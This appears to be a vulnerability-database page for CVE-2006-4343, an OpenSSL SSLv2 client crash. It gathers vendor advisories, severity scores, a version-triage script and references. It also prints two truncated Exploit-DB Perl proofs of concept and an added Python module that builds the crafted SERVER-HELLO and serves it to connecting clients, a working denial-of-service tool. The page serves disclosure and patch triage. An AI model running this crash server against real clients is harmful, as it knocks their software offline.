CVE-2006-4343
Published 2006-09-28
CVE-2006-4343: The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause…
Priority P4 · 25 · medium · CVSS 2.0 base score 4.3 · vector AV:N/AC:M/Au:N/C:N/I:N/A:P
Exploit: public PoC (two Exploit-DB entries below)
EPSS: 17.42% (96.7th percentile)
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
Affected
27 ranges · showing 25 (distinct rows)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | openssl | < 0.9.8c-2 (bookworm) | 0.9.8c-2 (bookworm) |
| openssl | openssl | — | — |
| openssl | openssl | >= 0 < 0.9.8c-2 | 0.9.8c-2 |
The "0.9.8c-2" in the last two rows is the Debian package version that carries the fix (see the Debian entry below), not an upstream OpenSSL release; the upstream fixed releases are 0.9.7l and 0.9.8d, as the description states. Distributions that backport the patch keep an older version string (Red Hat states below that Red Hat Enterprise Linux 5 does), so check the package changelog rather than the bare OpenSSL version.
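The ranges above as a runnable check, added here as an example and not taken from OpenSSL or any distribution's tooling. It takes `openssl version` style strings, orders OpenSSL's letter-suffixed 0.9.x versions correctly (0.9.8d < 0.9.8z < 0.9.8zh), and applies the ranges from the description: 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and anything older than 0.9.7. The Debian comparison uses the fixed package version 0.9.8c-2 listed on this page; the function names and the sample input strings are constructed for the example.

```python
"""Triage OpenSSL version strings against the CVE-2006-4343 ranges.

Added example (not OpenSSL's or any distribution's code). A version string
cannot see backported patches (Red Hat states RHEL 5 carries one; Debian ships
the fix in package 0.9.8c-2), so True means "inspect the package changelog",
not "confirmed exploitable".
"""
import re
from functools import total_ordering

# "OpenSSL 0.9.8c 05 Sep 2006" -> ("0", "9", "8", "c"); two-letter levels like 0.9.8zh are allowed.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]*)")
# Debian package versions look like "0.9.8c-2": upstream version, dash, package revision.
_DEB_REVISION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)[a-z]*-(\d+)")


@total_ordering
class OpenSSLVersion:
    """Ordered major.minor.fix[letters] version, as used by OpenSSL 0.9.x."""

    def __init__(self, text: str):
        m = _VERSION_RE.search(text)
        if not m:
            raise ValueError(f"no OpenSSL version found in {text!r}")
        self.major, self.minor, self.fix = (int(g) for g in m.group(1, 2, 3))
        self.patch = m.group(4)

    def _key(self):
        # No letter sorts before "a"; "z" sorts before "za" (longer suffix = later release).
        return (self.major, self.minor, self.fix, len(self.patch), self.patch)

    def __eq__(self, other):
        return self._key() == other._key()

    def __lt__(self, other):
        return self._key() < other._key()

    @property
    def branch(self):
        return (self.major, self.minor, self.fix)

    def __repr__(self):
        return f"OpenSSLVersion({self.major}.{self.minor}.{self.fix}{self.patch})"


# Upstream releases that close CVE-2006-4343 on each affected branch (from the description).
FIXED_IN = {
    (0, 9, 7): OpenSSLVersion("0.9.7l"),
    (0, 9, 8): OpenSSLVersion("0.9.8d"),
}


def is_vulnerable(text: str) -> bool:
    """True if the OpenSSL version found in `text` falls inside the affected ranges."""
    v = OpenSSLVersion(text)
    fixed = FIXED_IN.get(v.branch)
    if fixed is not None:
        return v < fixed
    # "and earlier versions": every branch before 0.9.7 is affected; 0.9.9/1.x never were.
    return v.branch < (0, 9, 7)


# Debian's fixed package version as listed on this page.
DEBIAN_FIXED_UPSTREAM = OpenSSLVersion("0.9.8c")
DEBIAN_FIXED_REVISION = 2


def debian_package_vulnerable(pkg_version: str) -> bool:
    """Compare a Debian package version such as "0.9.8c-1" with the fixed package 0.9.8c-2."""
    m = _DEB_REVISION_RE.search(pkg_version)
    if not m:
        raise ValueError(f"not a Debian package version: {pkg_version!r}")
    upstream, revision = OpenSSLVersion(pkg_version), int(m.group(4))
    if upstream != DEBIAN_FIXED_UPSTREAM:
        return upstream < DEBIAN_FIXED_UPSTREAM
    return revision < DEBIAN_FIXED_REVISION


def triage(version_lines):
    """Map each `openssl version` output line (constructed sample input) to a verdict."""
    return {line: is_vulnerable(line) for line in version_lines}
```

Feed `triage()` the output of `openssl version` collected from each host; anything flagged on a distribution that backports fixes still needs a changelog check, as the page's Red Hat statement shows.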
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
| osv | — | 4.3 | MEDIUM | — |
| vendor_cisco | — | 7.8 | HIGH | — |
| vendor_ubuntu | — | 7.8 | HIGH | — |
| vendor_debian | — | 4.3 | MEDIUM | — |
| vendor_redhat | — | 4.3 | MEDIUM | — |
The 7.8 HIGH scores from Cisco and Ubuntu belong to multi-CVE advisories that also cover the SSL_get_shared_ciphers() buffer overflow (CVE-2006-3738) and the ASN.1 denial-of-service issues (CVE-2006-2937, CVE-2006-2940). Every source that scores CVE-2006-4343 on its own rates it 4.3 MEDIUM: a crash of the SSLv2 client with no confidentiality or integrity impact.
VMware
VMSA-2008-0005: Several critical security vulnerabilities have been addressed in the newest releases of VMware's hosted product line
vendor_vmware · 2008-03-17 · CVSS 6.9 · CVE-2006-2937 [MEDIUM]
a. Host to guest shared folder (HGFS) traversal vulnerability
On Windows hosts, if you have configured a VMware host to guest shared folder (HGFS), it is possible for a program running in the guest to gain access to the host's file system and create or modify executable files in sensitive locations.
NOTE: VMware Server is not affected because it doesn't use host to guest shared folders. No versions of ESX Server, including ESX Server 3i, are affected by this vulnerability, because ESX Server is based on a bare-metal hypervisor architecture and not a hosted architecture, and it doesn't include any shared folder abilities. Fusion and Linux based hosted product
Cisco
Multiple Vulnerabilities in OpenSSL Library
vendor_cisco · 2006-11-08 · CVSS 7.8 · CVE-2006-4339 [HIGH]
This is the Cisco PSIRT response to the multiple security advisories published by The OpenSSL Project. The vulnerabilities are as follows:
RSA Signature Forgery (CVE-2006-4339), described in http://www.openssl.org/news/secadv_20060905.txt
ASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940), described in http://www.openssl.org/news/secadv_20060928.txt
SSL_get_shared_ciphers() buffer overflow (CVE-2006-3738), also in http://www.openssl.org/news/secadv_20060928.txt
SSLv2 Client Crash (CVE-2006-4343), also in http://www.openssl.org/news/secadv_20060928.txt
As of this publication, there are no workarounds available for any of these vulnerabilities, but it may be possible to mitigate some of the exposure. This Security Response lists the
Ubuntu
openssl vulnerabilities
vendor_ubuntu · 2006-09-29 · CVSS 7.8 · CVE-2006-2937 [HIGH]
Dr. Henson of the OpenSSL core team and Open Network Security
discovered a mishandled error condition in the ASN.1 parser. By
sending specially crafted packet data, a remote attacker could exploit
this to trigger an infinite loop, which would render the service
unusable and consume all available system memory. (CVE-2006-2937)
Certain types of public key could take disproportionate amounts of
time to process. The library now limits the maximum key exponent size
to avoid Denial of Service attacks. (CVE-2006-2940)
Tavis Ormandy and Will Drewry of the Google Security Team discovered a
buffer overflow in the SSL_get_shared_ciphers() function. By sending
specially crafted packets to applications that use this function (like
Exim
BSD
FreeBSD-SA-06:23.openssl: Multiple problems in crypto(3)
bsd_advisories · 2006-09-28 · CVSS 7.8 · CVE-2006-2937 [HIGH]
FreeBSD-SA-06:23.openssl Security Advisory
The FreeBSD Project
Topic: Multiple problems in crypto(3)
Category: contrib
Module: openssl
Announced: 2006-09-28
Credits: Dr S N Henson, Tavis Ormandy, Will Drewry
Stephen Kiernan (Juniper SIRT)
Affects: All FreeBSD releases.
Corrected: 2006-09-29 13:44:03 UTC (RELENG_6, 6.2-PRERELEASE)
2006-09-29 13:44:31 UTC (RELENG_6_1, 6.1-RELEASE-p9)
2006-09-29 13:44:45 UTC (RELENG_6_0, 6.0-RELEASE-p14)
2006-09-29 13:45:01 UTC (RELENG_5, 5.5-STABLE)
2006-09-29 13:45:43 UTC (RELENG_5_5, 5.5-RELEASE-p7)
2006-09-29 13:45:59 UTC (RELENG_5_4, 5.4-RELEASE-p21)
2006-09-29 13:46:10 UTC (RELENG_5_3, 5.3-RELEASE-p36)
2006-09-29 13:46:23 UTC (RELENG_4, 4.11-STABLE)
2006-09-29 13:46:41 UTC (RELENG_4_11, 4.11-RELEASE-p24)
CVE Name: CVE-2006-2937, CVE-2006-2940, CVE-200
Red Hat
openssl sslv2 client code
vendor_redhat · 2006-09-28 · CVSS 4.3 · CVE-2006-4343 [MEDIUM]
Description identical to the NVD text above.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian
CVE-2006-4343: openssl
vendor_debian · 2006 · CVSS 4.3 · CVE-2006-4343 [MEDIUM]
Description identical to the NVD text above.
Scope: local
bookworm: resolved (fixed in 0.9.8c-2)
bullseye: resolved (fixed in 0.9.8c-2)
forky: resolved (fixed in 0.9.8c-2)
sid: resolved (fixed in 0.9.8c-2)
trixie: resolved (fixed in 0.9.8c-2)
GHSA
GHSA-vrm9-vqv5-39gr
ghsa_unreviewed · 2022-05-03 · CVE-2006-4343 [MEDIUM] · CWE-476 (NULL Pointer Dereference)
Description identical to the NVD text above.
OSV
CVE-2006-4343
osv · 2006-09-28 · CVSS 4.3 · CVE-2006-4343 [MEDIUM]
Description identical to the NVD text above.
No detection rules found.
Exploit-DB
OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash
exploitdb · 2007-12-23 · CVSS 4.3 · CVE-2006-4343 [MEDIUM]

```perl
# Beyond Security PoC (Noam Rathaus; the same script as the next Exploit-DB
# entry): a fake SSLv2 server that answers any connecting client with a crafted
# SERVER-HELLO. The listing on the page starts mid-line and stops mid-statement;
# the opening lines are restored from the identical script in the next entry.
use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());
while ( $new_sock = $sock->accept() )
{
printf ("new connection\n");
my $rin;
my $line;
# Wait briefly for the CLIENT-HELLO; its content is ignored.
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);
my $ciphers = "";                                          # empty CIPHER-SPECS field
my $ciphers_length = pack('n', length($ciphers));
my $certificate = "";                                      # empty CERTIFICATE field
my $certificate_length = pack('n', length($certificate));
my $packet_sslv2 =
"\x04".            # MSG-SERVER-HELLO
"\x01".            # SESSION-ID-HIT (default 0x01)
"\x00".            # CERTIFICATE-TYPE: no certificate
"\x00\x02".        # SERVER-VERSION 2
$certificate_length.
$ciphers_length.
"\x00\x10".        # CONNECTION-ID-LENGTH = 16
# Certificate
$certificate.
# Ciphers
$ciphers.
# Connection ID (16 bytes)
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";
# The listing on the page ends here, mid-statement.
my $ssl_lengt
```
Exploit-DB
OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service
exploitdb · 2006-09-28 · CVSS 4.3 · CVE-2006-4343 [MEDIUM]
source: https://www.securityfocus.com/bid/20246/info
OpenSSL is prone to a denial-of-service vulnerability.
A malicious server could cause a vulnerable client application to crash, effectively denying service.

```perl
#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response
use strict;
use IO::Socket;
# Listen on 443 and hand each accepted client the crafted SERVER-HELLO.
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());
while ( $new_sock = $sock->accept() )
{
# The listing on the page ends here; the previous entry carries the rest of the same script.
printf ("new
```
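The SERVER-HELLO the two Exploit-DB listings above construct, rebuilt and parsed in Python as an added example; this is not Exploit-DB's, Beyond Security's or OpenSSL's code. The field order and the constant values (message type 0x04, session-id hit 0x01, certificate type 0x00, version 0x0002, three 16-bit lengths, then an empty certificate, an empty cipher-spec list and the 16-byte connection id) are read off the Perl PoC. The two-byte SSLv2 record header (high bit set, low 15 bits carrying the length, no padding) is an assumption taken from the SSLv2 draft specification, since the page's listing stops before it builds that header; the port 4433 and every function name are choices made for this example. The parser shows the checks a client has to make before it uses any of the three variable-length fields; the page does not say which field the OpenSSL client mishandled, and this example does not claim to.

```python
"""Build and parse the SSLv2 SERVER-HELLO sent by the Exploit-DB PoC above.

Added example (not Exploit-DB's, Beyond Security's or OpenSSL's code). The
record header format is assumed from the SSLv2 draft; the message layout is
taken from the Perl PoC on this page.
"""
import socket
import struct
from dataclasses import dataclass, field

# 16-byte CONNECTION-ID copied from the PoC.
CONN_ID = bytes.fromhex("f5611bc40b341b113c52e993d1fa29e9")


def build_server_hello(certificate: bytes = b"", ciphers: bytes = b"",
                       conn_id: bytes = CONN_ID, session_id_hit: int = 1,
                       cert_type: int = 0, version: int = 0x0002) -> bytes:
    """Serialize a SERVER-HELLO; the defaults reproduce the PoC's bytes exactly."""
    if len(ciphers) % 3:
        raise ValueError("SSLv2 CIPHER-SPECs are 3 bytes each")
    header = bytes([0x04, session_id_hit, cert_type]) + struct.pack("!H", version)
    lengths = struct.pack("!HHH", len(certificate), len(ciphers), len(conn_id))
    return header + lengths + certificate + ciphers + conn_id


def sslv2_record(body: bytes) -> bytes:
    """Wrap a handshake message in a two-byte SSLv2 record header (assumed format)."""
    if len(body) > 0x7FFF:
        raise ValueError("two-byte SSLv2 header carries at most 32767 bytes")
    return struct.pack("!H", 0x8000 | len(body)) + body


def unwrap_record(record: bytes) -> bytes:
    """Inverse of sslv2_record: validate the header and return the message body."""
    if len(record) < 2 or not record[0] & 0x80:
        raise ValueError("expected a two-byte SSLv2 record header")
    length = struct.unpack("!H", record[:2])[0] & 0x7FFF
    if len(record) != 2 + length:
        raise ValueError(f"header says {length} bytes, got {len(record) - 2}")
    return record[2:]


@dataclass
class ServerHello:
    session_id_hit: int
    cert_type: int
    version: int
    certificate: bytes
    cipher_specs: list = field(default_factory=list)
    conn_id: bytes = b""


def parse_server_hello(msg: bytes) -> ServerHello:
    """Parse a SERVER-HELLO the way a careful client should: every declared
    length is checked against the bytes actually present before a field is used."""
    if len(msg) < 11 or msg[0] != 0x04:
        raise ValueError("not a SERVER-HELLO")
    version, cert_len, ciph_len, cid_len = struct.unpack("!HHHH", msg[3:11])
    if len(msg) != 11 + cert_len + ciph_len + cid_len:
        raise ValueError("length fields disagree with message size")
    if ciph_len % 3:
        raise ValueError("CIPHER-SPECS length is not a multiple of 3")
    pos = 11
    cert = msg[pos:pos + cert_len]
    pos += cert_len
    ciph = msg[pos:pos + ciph_len]
    pos += ciph_len
    cid = msg[pos:pos + cid_len]
    specs = [ciph[i:i + 3] for i in range(0, ciph_len, 3)]
    return ServerHello(msg[1], msg[2], version, cert, specs, cid)


def serve_once(host: str = "127.0.0.1", port: int = 4433) -> int:
    """Accept one client, ignore its CLIENT-HELLO like the PoC does, send the
    crafted record and return the number of bytes written. Lab use only."""
    record = sslv2_record(build_server_hello())
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(0.5)
            try:
                conn.recv(1024)
            except socket.timeout:
                pass
            conn.sendall(record)
    return len(record)


if __name__ == "__main__":
    print(build_server_hello().hex())
    serve_once()
```

Run the module directly to print the 27-byte message and serve it once on 127.0.0.1:4433 to a client you are testing; a fixed SSLv2 client should drop the connection on the empty certificate rather than crash, and a client that negotiates only SSLv3 or TLS never reaches this code path at all.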
Bugzilla
CVE-2006-4343 openssl sslv2 client code
bugzilla · 2008-01-29 · CVSS 4.3 · CVE-2006-4343 [MEDIUM]
Common Vulnerabilities and Exposures assigned an identifier CVE-2006-4343 to the following vulnerability:
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
References:
http://www.securityfocus.com/archive/1/archive/1/456546/100/200/threaded
http://www.securityfocus.com/archive/1/archive/1/447318/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/447393/100/0/threaded
http://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049715.html
http://www.milw0rm.com/exploits/4773
http://www.openssl.org/news/secadv_20060928.txt
http
Bugzilla
CVE-2006-3738 OpenSSL issues (CVE-2006-4343, CVE-2006-2940, CVE-2006-2937, CVE-2006-4339)
bugzilla · 2006-10-03 · CVSS 7.8 · CVE-2006-3738 [HIGH]
+++ This bug was initially created as a clone of Bug #206940, Bug #207274,
and Bug #207276 +++
Four CVE issues:
-- Two from Bug #206940
1) Buffer Overflow: Tavis Ormandy and Will Drewry of the Google Security
Team discovered a buffer overflow in SSL_get_shared_ciphers utility
function, used by some applications such as exim and mysql. An attacker
could send a list of ciphers that would overrun a buffer. CVE-2006-3738
2) Denial of Service: Tavis Ormandy and Will Drewry of the Google Security
Team discovered a possible DoS in the sslv2 client code. Where a client
application uses OpenSSL to make a SSLv2 connection to a malicious server
that server could cause the client to crash. CVE-2006-4343
-- O
Bugzilla
CVE-2006-3738 OpenSSL issues (CVE-2006-4343)
bugzilla · 2006-09-18 · CVSS 10.0 · CVE-2006-3738 [CRITICAL]
Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer
overflow in SSL_get_shared_ciphers utility function, used by some
applications such as exim and mysql. An attacker could send a list of
ciphers that would overrun a buffer CVE-2006-3738
Tavis Ormandy and Will Drewry of the Google Security Team discovered a
possible DoS in the sslv2 client code. Where a client application uses
OpenSSL to make a SSLv2 connection to a malicious server that server
could cause the client to crash. CVE-2006-4343
EMBARGO until 20060928
Discussion:
Created attachment 136527
Proposed patch CVE-2006-4343
---
Created attachment 136528
Proposed patch CVE-2006-3738
---
removing embargo, public at http://www.openssl.org/news/secadv_20060928
References
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-007.txt.asc
ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc
http://docs.info.apple.com/article.html?artnum=304829
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01118771
http://issues.rpath.com/browse/RPL-613
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00805100
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00849540
http://kolab.org/security/kolab-vendor-notice-11.txt
http://lists.apple.com/archives/security-announce/2006/Nov/msg00001.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049715.html
http://lists.vmware.com/pipermail/security-announce/2008/000008.html
http://marc.info/?l=bugtraq&m=130497311408250&w=2
http://openbsd.org/errata.html#openssl2
http://openvpn.net/changelog.html
http://secunia.com/advisories/22094
http://secunia.com/advisories/22116
http://secunia.com/advisories/22130
http://secunia.com/advisories/22165
http://secunia.com/advisories/22166
http://secunia.com/advisories/22172
http://secunia.com/advisories/22186
http://secunia.com/advisories/22193
http://secunia.com/advisories/22207
http://secunia.com/advisories/22212
http://secunia.com/advisories/22216
http://secunia.com/advisories/22220
http://secunia.com/advisories/22240
http://secunia.com/advisories/22259
http://secunia.com/advisories/22260
http://secunia.com/advisories/22284
http://secunia.com/advisories/22298
http://secunia.com/advisories/22330
http://secunia.com/advisories/22385
http://secunia.com/advisories/22460
http://secunia.com/advisories/22487
http://secunia.com/advisories/22500
http://secunia.com/advisories/22544
http://secunia.com/advisories/22626
http://secunia.com/advisories/22758
http://secunia.com/advisories/22772
http://secunia.com/advisories/22791
http://secunia.com/advisories/22799
http://secunia.com/advisories/23038
http://secunia.com/advisories/23155
http://secunia.com/advisories/23280
http://secunia.com/advisories/23309
http://secunia.com/advisories/23340
http://secunia.com/advisories/23680
http://secunia.com/advisories/23794
http://secunia.com/advisories/23915
http://secunia.com/advisories/24950
http://secunia.com/advisories/25420
http://secunia.com/advisories/25889
http://secunia.com/advisories/26329
http://secunia.com/advisories/30124
http://secunia.com/advisories/31492
http://security.freebsd.org/advisories/FreeBSD-SA-06:23.openssl.asc
http://security.gentoo.org/glsa/glsa-200610-11.xml
http://securitytracker.com/id?1016943
http://securitytracker.com/id?1017522
http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.676946
http://sourceforge.net/project/shownotes.php?release_id=461863&group_id=69227
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1
http://support.avaya.com/elmodocs2/security/ASA-2006-220.htm
http://support.avaya.com/elmodocs2/security/ASA-2006-260.htm
http://www.cisco.com/en/US/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html
http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml
http://www.debian.org/security/2006/dsa-1185
http://www.debian.org/security/2006/dsa-1195
http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml
http://www.ingate.com/relnote-452.php
http://www.kb.cert.org/vuls/id/386964
http://www.mandriva.com/security/advisories?name=MDKSA-2006:172
http://www.mandriva.com/security/advisories?name=MDKSA-2006:177
http://www.mandriva.com/security/advisories?name=MDKSA-2006:178
http://www.novell.com/linux/security/advisories/2006_24_sr.html
http://www.novell.com/linux/security/advisories/2006_58_openssl.html
http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.021-openssl.html
http://www.openssl.org/news/secadv_20060928.txt
http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html
http://www.osvdb.org/29263
http://www.redhat.com/support/errata/RHSA-2006-0695.html
http://www.redhat.com/support/errata/RHSA-2008-0629.html
http://www.securityfocus.com/archive/1/447318/100/0/threaded
http://www.securityfocus.com/archive/1/447393/100/0/threaded
http://www.securityfocus.com/archive/1/456546/100/200/threaded
http://www.securityfocus.com/archive/1/489739/100/0/threaded
http://www.securityfocus.com/bid/20246
http://www.securityfocus.com/bid/22083
http://www.securityfocus.com/bid/28276
http://www.serv-u.com/releasenotes/
http://www.trustix.org/errata/2006/0054
http://www.ubuntu.com/usn/usn-353-1
http://www.us-cert.gov/cas/techalerts/TA06-333A.html
http://www.vmware.com/security/advisories/VMSA-2008-0005.html
http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html
http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html
http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html
+ 162 more references
Published: 2006-09-28